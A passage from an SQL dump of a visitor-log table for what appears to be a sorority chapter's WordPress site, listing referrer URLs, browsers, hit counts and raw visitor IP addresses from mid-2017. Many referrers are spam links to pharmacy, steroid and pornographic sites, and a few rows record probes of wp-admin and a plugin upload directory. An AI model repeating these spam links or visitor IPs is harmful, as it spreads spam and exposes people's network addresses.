'Windows','6.0','','46.118.158.199','000',1,0),(8156,'2017-07-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.125.207','000',2,0),(8157,'2017-07-30','http://zphiblgz.org','Chrome','Windows','10.0.648.204','','198.240.85.206','000',1,0),(8158,'2017-07-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.107.85.62','000',1,0),(8159,'2017-07-30','http://zphiblgz.org/','Firefox','Windows','7.0.1','','177.154.139.202','000',1,0),(8160,'2017-07-30','http://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.14','000',1,0),(8161,'2017-07-30','http://zphiblgz.org','Firefox','Windows','40.1','','178.164.166.90','000',1,0),(8162,'2017-07-30','http://pizza-imperia.com/','Chrome','Linux','37.0.2062.120','','176.126.252.12','000',1,0),(8163,'2017-07-30','http://zphiblgz.org','Firefox','Windows','40.1','','99.50.119.58','000',1,0),(8164,'2017-07-30','http://life-instyle.com/architectural-design.html','MSIE','Windows','7.0a1','','188.163.72.17','000',3,0),(8165,'2017-07-30','http://trailer.cinemaflix.website/','MSIE','Windows','5.5','','104.238.179.181','000',2,0),(8166,'2017-07-30','http://zphiblgz.org','Chrome','Macintosh','35.0.1916.114','','159.203.93.120','000',1,0),(8167,'2017-07-30','http://zphiblgz.org','Chrome','Macintosh','34.0.1847.131','','159.203.93.120','000',2,0),(8168,'2017-07-30','http://zphiblgz.org','Firefox','Macintosh','29.0','','159.203.93.120','000',1,0),(8169,'2017-07-30','http://zphiblgz.org','Firefox','Windows','28.0','','159.203.93.120','000',1,0),(8170,'2017-07-30','http://zphiblgz.org','Chrome','Windows','34.0.1847.131','','159.203.93.120','000',4,0),(8171,'2017-07-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','84.19.180.135','000',2,0),(8172,'2017-07-30','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','195.130.205.77','000',1,0),(8173,'2017-07-30','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.129.246','000',4,0),(8174,'2017-07-30','http://zphiblgz.org','Chrome','Linux','5.0.342.1','','188.165.234.52','000',91,0),(8175,'2017-07-30','http://y8games-free.com/','MSIE','Windows','5.5','','46.119.112.177','000',2,0),(8176,'2017-07-30','https://www.google.com/','Safari','iPhone','10.0','','71.193.54.8','000',1,0),(8177,'2017-07-30','http://zphiblgz.org','Firefox','Windows','40.1','','115.133.88.103','000',2,0),(8178,'2017-07-30','https://www.google.com/','Chrome','Windows','59.0.3071.115','','172.58.139.185','000',2,0),(8179,'2017-07-30','https://mojpregled.com/','MSIE','Windows','7.0b','','188.163.72.17','000',2,0),(8180,'2017-07-31','http://zphiblgz.org','Firefox','Windows','40.1','','178.95.236.51','000',1,0),(8181,'2017-07-31','http://kemerovo.zrus.org/','Opera','Windows','8.01','','46.118.112.220','000',2,0),(8182,'2017-07-31','http://zphiblgz.org','Firefox','Windows','40.1','','81.235.226.209','000',2,0),(8183,'2017-07-31','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','5.196.31.125','000',2,0),(8184,'2017-07-31','http://remontvsamare.su/','MSIE','Windows','5.0','','46.119.112.177','000',3,0),(8185,'2017-07-31','http://zphiblgz.org','Firefox','Windows','40.1','','138.59.0.26','000',2,0),(8186,'2017-07-31','http://zphiblgz.org','Firefox','Windows','40.1','','83.152.179.170','000',1,0),(8187,'2017-07-31','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(8188,'2017-07-31','zphiblgz.org','Chrome','Windows','50.0.2661.75','','89.36.211.128','000',4,0),(8189,'2017-07-31','http://www.google.com/search?q=zeta+phi+beta+Maryland+2017+events&prmd=ivns&ei=Ssx-WZyrMMSx-wHUkYTgCQ&start=10&sa=N','Firefox','Android','54.0','','164.82.22.2','000',1,0),(8190,'2017-07-31','http://zphiblgz.org','Firefox','Windows','40.1','','123.231.124.190','000',2,0),(8191,'2017-07-31','https://essayservicewriting.org/','MSIE','Windows','6.0','','46.211.197.119','000',3,0),(8192,'2017-07-31','http://zphiblgz.org','Firefox','Windows','40.1','','223.25.54.222','000',2,0),(8193,'2017-07-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','66.70.217.179','000',2,0),(8194,'2017-07-31','http://zphiblgz.org','Firefox','Windows','50.0','','46.118.156.191','000',2,0),(8195,'2017-07-31','https://emerson-rus.ru/','MSIE','Windows','6.0','','46.118.158.199','000',1,0),(8196,'2017-07-31','https://stop-gepatit.te.ua/','MSIE','Windows','6.0','','178.137.4.41','000',3,0),(8197,'2017-07-31','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','198.71.235.18','000',1,0),(8198,'2017-07-31','https://www.google.com/','Chrome','Windows','57.0.2987.98','','192.30.144.6','000',1,0),(8199,'2017-07-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.25.103.69','000',2,0),(8200,'2017-07-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.137.67.116','000',2,0),(8201,'2017-07-31','http://www.anabolics.shop/','MSIE','Windows','6.0','','46.118.112.220','000',2,0),(8202,'2017-07-31','zphiblgz.org','Chrome','Windows','50.0.2661.75','','119.29.191.171','000',15,0),(8203,'2017-07-31','zphiblgz.org','Chrome','Windows','50.0.2661.75','','37.59.52.77','000',12,0),(8204,'2017-07-31','http://zphiblgz.org','MSIE','Windows','11.0','','137.200.32.54','000',2,0),(8205,'2017-07-31','http://zphiblgz.org','Unknown','Unknown','Unknown','','172.3.160.122','000',2,0),(8206,'2017-07-31','http://zphiblgz.org','Safari','iPhone','6.0','','123.126.113.104','000',1,0),(8207,'2017-07-31','http://zphiblgz.org','Safari','Macintosh','7.0.3','','138.197.111.142','000',1,0),(8208,'2017-07-31','http://zphiblgz.org','Firefox','Windows','40.1','','88.9.3.170','000',2,0),(8209,'2017-07-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','141.138.141.208','000',2,0),(8210,'2017-07-31','http://videochat.ph/','MSIE','Windows','5.5','','46.119.112.177','000',1,0),(8211,'2017-07-31','http://zphiblgz.org','Firefox','Windows','29.0','','134.19.230.49','000',2,0),(8212,'2017-07-31','http://zphiblgz.org','Firefox','Windows','30.0','','37.235.171.248','000',1,0),(8213,'2017-07-31','http://zphiblgz.org/wp-admin/','Firefox','Windows','30.0','','45.123.222.55','000',2,0),(8214,'2017-07-31','http://podshipniki-nsk.ru/','MSIE','Unknown','7.0b','','178.137.4.41','000',3,0),(8215,'2017-07-31','http://zphiblgz.org','Firefox','Windows','40.1','','175.158.225.0','000',1,0),(8216,'2017-07-31','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','74.208.16.103','000',2,0),(8217,'2017-07-31','http://zphiblgz.org','Firefox','Windows','40.1','','117.102.50.221','000',2,0),(8218,'2017-07-31','http://zpharm.de/sites/lb/05_pharma_firmen.htm','Firefox','Windows','43.0','','188.129.236.68','000',1,0),(8219,'2017-07-31','http://www.google.gr/','Chrome','Android','59.0.3071.125','','91.92.91.50','000',1,0),(8220,'2017-07-31','http://zphiblgz.org','Firefox','Windows','40.1','','2.239.255.51','000',1,0),(8221,'2017-07-31','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',13,0),(8222,'2017-07-31','http://www.zphiblgz.org','MSIE','Windows','9.0','','184.154.36.185','000',5,0),(8223,'2017-07-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','194.54.162.212','000',2,0),(8224,'2017-07-31','https://www.google.com.pk/','Chrome','Android','59.0.3071.125','','64.233.173.38','000',1,0),(8225,'2017-07-31','http://life-instyle.com/eda.html','MSIE','Windows','5.5','','46.118.112.220','000',2,0),(8226,'2017-07-31','https://www.google.com.pk/','Chrome','Android','59.0.3071.125','','119.160.116.101','000',1,0),(8227,'2017-07-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.170.41.8','000',2,0),(8228,'2017-07-31','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.54','000',1,0),(8229,'2017-07-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.8.198','000',2,0),(8230,'2017-07-31','https://pregnant.guru/','MSIE','Windows','6.0','','188.163.72.17','000',2,0),(8231,'2017-07-31','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','81.198.171.116','000',1,0),(8232,'2017-07-31','http://zphiblgz.org','wp-iphone','Unknown','Unknown','','81.198.171.116','000',1,0),(8233,'2017-07-31','http://zphiblgz.org','Firefox','Windows','40.1','','31.182.192.124','000',1,0),(8234,'2017-07-31','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.141.39.47','000',2,0),(8235,'2017-07-31','http://zphiblgz.org','Firefox','Windows','40.1','','196.202.95.58','000',1,0),(8236,'2017-07-31','http://zphiblgz.org','Firefox','Macintosh','37.0','','107.152.139.222','000',2,0),(8237,'2017-07-31','http://zphiblgz.org','Firefox','Windows','26.0','','188.138.105.84','000',1,0),(8238,'2017-07-31','http://zphiblgz.org','Firefox','Windows','26.0','','188.138.105.23','000',1,0),(8239,'2017-07-31','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','5.135.67.70','000',2,0),(8240,'2017-07-31','http://zphiblgz.org','Firefox','Windows','40.1','','117.120.18.133','000',2,0),(8241,'2017-07-31','http://zphiblgz.org','MSIE','Windows','9.0','','131.253.25.95','000',1,0),(8242,'2017-07-31','http://pk-pomosch.ru/','MSIE','Unknown','7.0b','','46.118.112.220','000',1,0),(8243,'2017-08-01','https://via-energy-cumpara.com/','MSIE','Windows','6.0','','46.118.158.199','000',5,0),(8244,'2017-08-01','http://zphiblgz.org','Firefox','Windows','31.0','','37.49.178.34','000',6,0),(8245,'2017-08-01','http://zphiblgz.org','Firefox','Windows','40.1','','151.77.243.40','000',1,0),(8246,'2017-08-01','zphiblgz.org','Chrome','Windows','50.0.2661.75','','84.10.50.36','000',6,0),(8247,'2017-08-01','zphiblgz.org','Chrome','Windows','50.0.2661.75','','37.187.132.5','000',2,0),(8248,'2017-08-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.25.103.69','000',2,0),(8249,'2017-08-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.207','000',1,0),(8250,'2017-08-01','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(8251,'2017-08-01','http://karaganda.xkaz.org/','Opera','Windows','7.54','','46.118.158.199','000',1,0),(8252,'2017-08-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.179.129','000',2,0),(8253,'2017-08-01','http://zphiblgz.org','Firefox','Windows','40.1','','77.46.254.219','000',1,0),(8254,'2017-08-01','http://chatroulette.world/','MSIE','Windows','6.0','','46.119.112.177','000',7,0),(8255,'2017-08-01','http://zphiblgz.org','Firefox','Windows','40.1','','42.0.5.115','000',2,0),(8256,'2017-08-01','http://zphiblgz.org','Firefox','Windows','40.1','','181.196.134.80','000',1,0),(8257,'2017-08-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.53.83','000',2,0),(8258,'2017-08-01','http://zphiblgz.org','Firefox','Windows','1.0.7','','35.167.41.251','000',1,0),(8259,'2017-08-01','https://www.google.com/','Chrome','Windows','59.0.3071.115','','170.248.172.245','000',1,0),(8260,'2017-08-01','http://zphiblgz.org','Firefox','Windows','40.1','','62.114.200.117','000',2,0),(8261,'2017-08-01','http://zphiblgz.org','Firefox','Windows','29.0','','45.119.97.129','000',2,0),(8262,'2017-08-01','http://life-instyle.com/architectural-design.html','MSIE','Windows','5.0','','188.163.72.17','000',2,0),(8263,'2017-08-01','http://zphiblgz.org','Firefox','Windows','40.1','','120.62.10.195','000',2,0),(8264,'2017-08-01','http://zphiblgz.org','Firefox','Windows','40.1','','39.55.26.146','000',2,0),(8265,'2017-08-01','https://mojpregled.com/','MSIE','Windows','6.0','','188.163.72.17','000',1,0),(8266,'2017-08-01','http://zphiblgz.org','Mnogosearch-3','Unknown','Unknown','','173.49.24.118','000',1,0),(8267,'2017-08-01','http://zphiblgz.org','Firefox','Windows','40.1','','92.244.19.17','000',1,0),(8268,'2017-08-01','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjY9OqN0LbVAhXBeD4KHV1oB00QFggsMAE&url=http%3A%2F%2Fzphiblgz.org%2F&usg=AFQjCNHl6iFFa_3VuMKJmTgYMIkup1fP8Q','MSIE','Windows','11.0','','73.250.218.105','000',4,0),(8269,'2017-08-01','http://zphiblgz.org/lgz-celebrates-35-years-service-howard-county-md/','MSIE','Windows','6.0','','89.28.113.114','000',1,0),(8270,'2017-08-01','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','24.248.74.254','000',5,0),(8271,'2017-08-01','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(8272,'2017-08-01','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',2,0),(8273,'2017-08-01','http://zphiblgz.org','MSIE','Windows','11.0','','142.54.161.10','000',5,0),(8274,'2017-08-01','http://zphiblgz.org','Firefox','Windows','40.1','','222.99.196.100','000',1,0),(8275,'2017-08-01','http://zphiblgz.org','Firefox','Windows','40.1','','97.83.56.152','000',1,0),(8276,'2017-08-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.162.106','000',1,0),(8277,'2017-08-01','http://zphiblgz.org/','Firefox','Windows','7.0.1','','204.85.191.30','000',1,0),(8278,'2017-08-01','https://www.google.com/','Chrome','Linux','47.0.2526.80','','71.167.20.225','000',5,0),(8279,'2017-08-01','http://yoshkarola.zrus.org/','Unknown','Unknown','Unknown','','46.118.112.220','000',2,0),(8280,'2017-08-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','64.113.32.29','000',2,0),(8281,'2017-08-01','http://zphiblgz.org','Firefox','Windows','40.1','','46.27.188.149','000',1,0),(8282,'2017-08-01','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.102','000',1,0),(8283,'2017-08-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.52.230','000',2,0),(8284,'2017-08-01','http://zphiblgz.org','Chrome','Windows','50.0.2661.102','','146.185.223.150','000',3,0),(8285,'2017-08-01','https://buy-meds24.com/','MSIE','Unknown','7.0b','','178.137.4.41','000',3,0),(8286,'2017-08-01','http://www.nonprofitfacts.com/MD/Zeta-Phi-Beta-Sorority-Inc-Zeta-Phi-Beta-Sorority-Inc-Lambda-Gamma-Zeta-Chapter.html','MSIE','Windows','11.0','','71.121.208.23','000',2,0),(8287,'2017-08-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.90','000',2,0),(8288,'2017-08-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.63.229','000',2,0),(8289,'2017-08-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.102.148.67','000',2,0),(8290,'2017-08-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.88','000',1,0),(8291,'2017-08-01','http://zphiblgz.org','Firefox','Windows','51.0','','88.99.141.3','000',1,0),(8292,'2017-08-01','http://zphiblgz.org','Firefox','Windows','40.1','','138.36.240.150','000',1,0),(8293,'2017-08-01','http://zphiblgz.org','Chrome','Windows','36.0.1985.125','','14.207.168.113','000',2,0),(8294,'2017-08-01','http://zphiblgz.org','Chrome','Windows','36.0.1985.125','','223.29.225.37','000',1,0),(8295,'2017-08-01','http://zphiblgz.org','Chrome','Windows','36.0.1985.125','','171.97.192.151','000',2,0),(8296,'2017-08-01','http://zphiblgz.org','Chrome','Windows','36.0.1985.125','','14.177.6.70','000',1,0),(8297,'2017-08-01','http://zphiblgz.org','Chrome','Windows','36.0.1985.125','','45.220.22.56','000',3,0),(8298,'2017-08-01','http://www.anabolics.shop/','Opera','Windows','6.01','','46.118.112.220','000',1,0),(8299,'2017-08-01','http://zphiblgz.org','Firefox','Windows','7.0.1','','91.223.82.156','000',2,0),(8300,'2017-08-02','https://kichenaid.ru/','MSIE','Windows','5.5','','46.118.158.199','000',2,0),(8301,'2017-08-02','http://zphiblgz.org','Firefox','Windows','40.1','','105.229.17.155','000',2,0),(8302,'2017-08-02','http://zphiblgz.org','Firefox','Windows','29.0','','213.239.205.118','000',1,0),(8303,'2017-08-02','http://zphiblgz.org','Chrome','Windows','31.0.1650.57','','213.239.205.118','000',1,0),(8304,'2017-08-02','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','88.99.141.3','000',1,0),(8305,'2017-08-02','http://hdwallpapers-free.com/','MSIE','Windows','6.0','','178.137.4.41','000',3,0),(8306,'2017-08-02','http://zphiblgz.org','Firefox','Windows','51.0','','88.99.141.3','000',1,0),(8307,'2017-08-02','http://zphiblgz.org','Chrome','Windows','33.0.1800.0','','144.76.80.151','000',5,0),(8308,'2017-08-02','http://zphiblgz.org','MSIE','Windows','9.0','','213.239.205.118','000',5,0),(8309,'2017-08-02','http://zphiblgz.org','MSIE','Windows','10.0','','144.76.80.151','000',2,0),(8310,'2017-08-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','35.167.41.251','000',1,0),(8311,'2017-08-02','http://www.notbred.com/','Firefox','Windows','52.0','','185.36.102.114','000',2,0),(8312,'2017-08-02','http://zphiblgz.org','Firefox','Windows','1.0.7','','34.201.112.129','000',1,0),(8313,'2017-08-02','http://zphiblgz.org','Firefox','Windows','40.1','','49.194.139.125','000',1,0),(8314,'2017-08-02','http://zphiblgz.org','Firefox','Windows','40.1','','122.54.101.240','000',1,0),(8315,'2017-08-02','https://www.souvenirua.com/','MSIE','Windows','5.0','','46.118.112.220','000',3,0),(8316,'2017-08-02','https://ikritikimou.gr/','MSIE','Windows','6.0','','188.163.72.17','000',2,0),(8317,'2017-08-02','http://zphiblgz.org','Firefox','Windows','40.1','','116.103.72.128','000',1,0),(8318,'2017-08-02','http://zphiblgz.org','Firefox','Windows','40.1','','123.231.127.90','000',1,0),(8319,'2017-08-02','https://vk.com/vps_vds_dedicated_server','MSIE','Windows','6.0','','46.211.197.119','000',2,0),(8320,'2017-08-02','http://zphiblgz.org','Firefox','Windows','40.1','','41.140.169.238','000',1,0),(8321,'2017-08-02','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','217.160.62.99','000',1,0),(8322,'2017-08-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','66.70.217.179','000',4,0),(8323,'2017-08-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.77','000',1,0),(8324,'2017-08-02','http://zphiblgz.org','MSIE','Windows','6.0','','188.65.211.238','000',1,0),(8325,'2017-08-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','78.109.23.1','000',2,0),(8326,'2017-08-02','http://zphiblgz.org','Firefox','Windows','40.1','','39.59.204.240','000',3,0),(8327,'2017-08-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.79.107','000',2,0),(8328,'2017-08-02','http://zphiblgz.org','Firefox','Windows','24.0','','110.49.168.22','000',2,0),(8329,'2017-08-02','http://zphiblgz.org','Firefox','Windows','40.1','','83.223.240.32','000',2,0),(8330,'2017-08-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.101.139.248','000',2,0),(8331,'2017-08-02','http://zphiblgz.org','Safari','iPhone','10.0','','204.126.132.241','000',5,0),(8332,'2017-08-02','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(8333,'2017-08-02','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',4,0),(8334,'2017-08-02','https://univerfiles.com/','MSIE','Windows','5.5','','46.118.112.220','000',3,0),(8335,'2017-08-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.124.59.202','000',2,0),(8336,'2017-08-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.10.68.132','000',2,0),(8337,'2017-08-02','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','111.221.46.181','000',2,0),(8338,'2017-08-02','http://komp-pomosch.ru/','MSIE','Windows','5.5','','188.163.72.17','000',3,0),(8339,'2017-08-02','https://www.google.com/','Chrome','Windows','60.0.3112.78','','204.126.132.241','000',4,0),(8340,'2017-08-02','http://zphiblgz.org','Chrome','Windows','45.0.2454.101','','109.252.110.172','000',1,0),(8341,'2017-08-02','https://www.google.com/','Chrome','Windows','59.0.3071.115','','71.246.246.227','000',1,0),(8342,'2017-08-02','http://zphiblgz.org','Firefox','Windows','40.1','','182.189.119.62','000',2,0),(8343,'2017-08-02','http://zphiblgz.org','Firefox','Windows','40.1','','81.190.173.102','000',1,0),(8344,'2017-08-02','http://zphiblgz.org','Opera','Windows','12.14','','34.201.111.20','000',1,0),(8345,'2017-08-02','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.50','000',1,0),(8346,'2017-08-02','http://zphiblgz.org','Firefox','Windows','40.1','','213.37.214.135','000',2,0),(8347,'2017-08-02','http://videochat.ph/','MSIE','Windows','6.0','','46.119.112.177','000',1,0),(8348,'2017-08-02','http://zphiblgz.org/','MSIE','Windows','6.0','','85.143.218.11','000',1,0),(8349,'2017-08-02','http://zphiblgz.org','MSIE','Windows','6.0','','81.177.3.147','000',1,0),(8350,'2017-08-02','http://zphiblgz.org','Firefox','Windows','40.1','','122.174.207.182','000',1,0),(8351,'2017-08-02','https://via-energy-acquistare.com/','MSIE','Windows','6.0','','46.118.158.199','000',1,0),(8352,'2017-08-02','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.56.11','000',2,0),(8353,'2017-08-02','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1501.9pb1mWLBMHZFnt7skHy9_lWGa6k20uUDK1icxUVrGpd2E_r0D4EW3KQf_RG9OzFg.f8c2e225a9ea4db4bfdb6d3ddda6374c74ba186b&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGv9iZwKiy-E54GYiollMFA&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSm0zUTByWUxuSllvZDA1eGNQak9RNklIYkYzWkI3S3V2LVMxOGszamc1ZkJKdndYckxuR0Z1&b64e=2&sign=b01cfc96f6ffb94c2f5556dbee8226bf&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7JarrhN_oyM0b1dGuoXDFX0YuK7ZPO6E04FNfdA9XmycTQEr-74iudBoR5f_SNwWhuiRTS0fI2ccs9R-hjLRDmlGs7NobwkotAe5PYM-fZmnLs8rtHJwZf1D_YA&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVwjJVQHb9Cs9Q4P2qa1LhJymTRTrBJECpydjaXTHTiz5e4Nsbv1R7b-4UDNRQ0M5o2De2Yycx14w&l10n=ru&cts=1501721204259&mc=7.35268874168','Firefox','Windows','53.0','','128.69.212.81','000',1,0),(8354,'2017-08-02','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','185.58.73.56','000',1,0),(8355,'2017-08-02','http://zphiblgz.org','Firefox','Windows','52.0','','46.229.170.197','000',1,0),(8356,'2017-08-02','http://zphiblgz.org','Chrome','Macintosh','57.0.2987.133','','46.229.170.197','000',1,0),(8357,'2017-08-02','http://zphiblgz.org','Go--client','Unknown','1.1','','217.182.94.191','000',1,0),(8358,'2017-08-03','http://zphiblgz.org','MSIE','Windows','11.0','','91.121.83.160','000',1,0),(8359,'2017-08-03','http://zphiblgz.org','Firefox','Windows','40.1','','200.6.143.73','000',1,0),(8360,'2017-08-03','http://karaganda.xkaz.org/','Opera','Windows','8.00','','46.118.158.199','000',3,0),(8361,'2017-08-03','http://zphiblgz.org','Firefox','Windows','40.1','','118.36.64.182','000',1,0),(8362,'2017-08-03','https://venerologiya.com/','MSIE','Windows','6.0','','188.163.72.17','000',6,0),(8363,'2017-08-03','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','217.160.62.99','000',2,0),(8364,'2017-08-03','http://zphiblgz.org','Chrome','Windows','34.0.1847.131','','104.236.70.129','000',6,0),(8365,'2017-08-03','http://zphiblgz.org','Firefox','Windows','28.0','','104.236.70.129','000',3,0),(8366,'2017-08-03','http://zphiblgz.org','MSIE','Windows','10.0','','104.236.70.129','000',1,0),(8367,'2017-08-03','https://i-hobot.ru/','MSIE','Windows','6.0','','46.118.158.199','000',3,0),(8368,'2017-08-03','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.21.6','000',1,0),(8369,'2017-08-03','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.248.4.53','000',2,0),(8370,'2017-08-03','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.109.205.17','000',2,0),(8371,'2017-08-03','https://mojpregled.com/','MSIE','Windows','5.5','','188.163.72.17','000',3,0),(8372,'2017-08-03','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','64.137.2.152','000',2,0),(8373,'2017-08-03','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.100.115.190','000',2,0),(8374,'2017-08-03','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.109.207.12','000',2,0),(8375,'2017-08-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.170.42.4','000',2,0),(8376,'2017-08-03','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','146.71.23.42','000',2,0),(8377,'2017-08-03','http://irkutsk.zrus.org/','MSIE','Windows','5.5','','46.118.112.220','000',2,0),(8378,'2017-08-03','http://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.109.207.63','000',2,0),(8379,'2017-08-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.118','000',1,0),(8380,'2017-08-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.142.15','000',2,0),(8381,'2017-08-03','http://zphiblgz.org','MSIE','Windows','11.0','','153.31.113.21','000',11,0),(8382,'2017-08-03','http://zphiblgz.org','Firefox','Windows','40.1','','200.59.171.126','000',2,0),(8383,'2017-08-03','http://zphiblgz.org','Firefox','Windows','54.0','','204.126.132.241','000',4,0),(8384,'2017-08-03','http://zphiblgz.org','Firefox','Windows','39.0','','180.235.134.156','000',1,0),(8385,'2017-08-03','http://zphiblgz.org','MSIE','Windows','8.0','','64.235.153.7','000',2,0),(8386,'2017-08-03','http://zphiblgz.org','Firefox','Windows','40.1','','41.104.235.37','000',2,0),(8387,'2017-08-03','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','198.101.15.64','000',1,0),(8388,'2017-08-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','94.142.242.84','000',2,0),(8389,'2017-08-03','http://www.zphiblgz.org/wp-content/plugins/wp-formgenerator/uploads/php/','Chrome','Windows','42.0.2311.152','','216.244.65.154','000',2,0),(8390,'2017-08-03','https://www.facebook.com/businesses.center/','MSIE','Windows','6.0','','178.137.4.41','000',5,0),(8391,'2017-08-03','http://xdoza.com/','Opera','Windows','7.54','','46.119.112.177','000',4,0),(8392,'2017-08-03','http://videochat.tv.br/','MSIE','Windows','6.0','','46.119.112.177','000',2,0),(8393,'2017-08-03','http://zphiblgz.org','Chrome','Windows','34.0.1847.131','','159.203.169.21','000',1,0),(8394,'2017-08-03','http://www.anabolics.shop/','MSIE','Windows','6.0','','46.118.112.220','000',4,0),(8395,'2017-08-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','94.177.123.116','000',2,0),(8396,'2017-08-03','http://www.zphibmaryland.org/chapters/','Safari','iPhone','10.0','','73.201.199.79','000',4,0),(8397,'2017-08-03','http://zphiblgz.org','Chrome','Macintosh','26.0.1410.65','','52.4.244.57','000',1,0),(8398,'2017-08-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.201','000',2,0),(8399,'2017-08-03','http://zphiblgz.org','Chrome','Windows','34.0.1847.116','','195.22.127.71','000',1,0),(8400,'2017-08-03','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',2,0),(8401,'2017-08-03','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',2,0),(8402,'2017-08-03','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','107.180.97.114','000',2,0),(8403,'2017-08-03','http://zphiblgz.org','Firefox','Windows','28.0','','195.22.127.71','000',1,0),(8404,'2017-08-03','http://typer.one/','MSIE','Windows','6.0','','178.137.154.138','000',3,0),(8405,'2017-08-03','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',1,0),(8406,'2017-08-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.255.202.66','000',1,0),(8407,'2017-08-03','http://zphiblgz.org/','Firefox','Windows','7.0.1','','62.210.105.116','000',1,0),(8408,'2017-08-03','http://zphiblgz.org','MSIE','Windows','6.0','','185.17.121.43','000',1,0),(8409,'2017-08-03','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(8410,'2017-08-03','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.171','000',2,0),(8411,'2017-08-03','http://zphiblgz.org','Safari','iPhone','10.0','','71.121.204.212','000',3,0),(8412,'2017-08-03','http://videochat.ph/','Unknown','Unknown','Unknown','','46.119.112.177','000',3,0),(8413,'2017-08-03','http://zphiblgz.org','Firefox','Windows','40.1','','79.54.77.199','000',1,0),(8414,'2017-08-03','http://www.sexybang.top/gal/5081.html','Chrome','Windows','58.0.3029.81','','185.36.102.114','000',2,0),(8415,'2017-08-03','http://zphiblgz.org','Firefox','Windows','40.1','','14.140.250.66','000',1,0),(8416,'2017-08-03','http://zphiblgz.org','Firefox','Windows','40.1','','187.207.88.122','000',2,0),(8417,'2017-08-04','http://pornolook.net/','MSIE','Windows','5.5','','46.118.158.199','000',3,0),(8418